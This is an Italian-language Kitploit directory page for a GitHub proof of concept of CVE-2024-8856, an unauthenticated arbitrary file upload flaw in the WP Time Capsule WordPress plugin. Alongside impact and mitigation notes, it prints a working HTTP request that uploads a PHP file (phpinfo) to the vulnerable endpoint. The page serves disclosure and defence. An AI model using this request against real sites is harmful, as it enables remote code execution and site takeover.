Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-8856 — Vulnerabilità di Caricamento Arbitrario di File nel Plugin WordPress WP Time Capsule | Kitploit
Strumenti/GitHubGitHub/ubaydev/cve-2024-8856
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHububaydev/cve-2024-8856

CVE-2024-8856

Vulnerabilità di Caricamento Arbitrario di File nel Plugin WordPress WP Time Capsule

Vedi Repository
2141 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-8856: Vulnerabilità di Upload Arbitrario di File nel Plugin WP Time Capsule per WordPress

Panoramica

CVE-2024-8856 è una vulnerabilità di sicurezza riscontrata nel plugin WP Time Capsule per WordPress che consente a utenti non autenticati di caricare file arbitrari sul server. Ciò può portare all'esecuzione remota di codice se i file caricati vengono eseguiti dal server. La vulnerabilità deriva da una validazione insufficiente dei file e può essere sfruttata inviando richieste appositamente formulate all'endpoint vulnerabile.

Versioni Affette

  • Versioni del plugin WP Time Capsule precedenti la 1.22.21 (corretta nella 1.22.22).

Impatto

Questa vulnerabilità consente a un utente non autenticato di:

  • Caricare script PHP malevoli sul server.
  • Eseguire codice arbitrario sul server, portando al compromesso completo del sistema.
  • Potenzialmente sfruttare questo accesso per compromettere ulteriormente l'applicazione web e l'infrastruttura sottostante.

Proof of Concept (PoC)

Di seguito è riportato un proof of concept che dimostra come sfruttare la vulnerabilità CVE-2024-8856 inviando una richiesta POST all'endpoint vulnerabile.

Richiesta d'Esempio

POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql

<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--

Spiegazione del PoC

  • Richiesta POST: La richiesta è una POST al percorso in cui è esposta la funzionalità di upload vulnerabile.
  • Content-Type: La richiesta imposta il Content-Type su multipart/form-data, necessario per i caricamenti di file.
  • Caricamento file: Il file è specificato nel corpo con un'intestazione Content-Disposition. Nell'esempio, tenta di caricare un file PHP contenente <?php phpinfo();, che mostrerà i dettagli di configurazione PHP se eseguito.
  • Endpoint vulnerabile: L'endpoint /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php è il punto di sfruttamento.

Mitigazione

Per mitigare questa vulnerabilità:

  • Aggiornare il plugin: Assicurarsi sempre che il plugin WP Time Capsule sia aggiornato all'ultima versione fornita dallo sviluppatore.
  • Restrizioni sul caricamento file: Implementare restrizioni sul caricamento file sul server per consentire solo tipi di file specifici (ad esempio, immagini) e impedire l'esecuzione dei file caricati.
  • Web Application Firewall (WAF): Utilizzare un firewall per applicazioni web (WAF) per rilevare e bloccare richieste malevole prima che raggiungano il server.

Riferimenti

CVE-2024-8856 - Database Nazionale delle Vulnerabilità

Conclusione

CVE-2024-8856 è una vulnerabilità grave che richiede attenzione immediata da parte degli amministratori di siti WordPress che utilizzano il plugin WP Time Capsule. È necessario adottare le opportune precauzioni per proteggere l'applicazione da potenziali sfruttamenti. Rimanere sempre aggiornati con le pratiche di sicurezza e gli aggiornamenti dei plugin.

Scarica lo strumento